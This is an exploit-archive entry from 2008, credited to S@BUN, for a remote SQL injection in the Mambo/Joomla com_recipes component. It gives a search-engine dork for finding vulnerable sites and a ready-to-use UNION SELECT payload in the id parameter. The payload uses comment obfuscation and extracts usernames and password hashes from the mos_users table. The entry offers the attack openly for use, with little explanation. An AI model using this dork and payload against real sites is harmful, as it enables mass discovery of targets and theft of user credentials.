Topic : | Mambo Component Recipes 1.00 (id) Remote SQL Injection Vulnerability
|
ExploitAlert : 3291
Credit : S@BUN
Date : 30.01.2008
Download
Plain text version
 Exploit Code : #########################################################################
#
# joomla SQL Injection(com_recipes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_recipes"
#
########################################################################
EXPLOIT :
index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/sel
ect/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,
0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_user
s/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|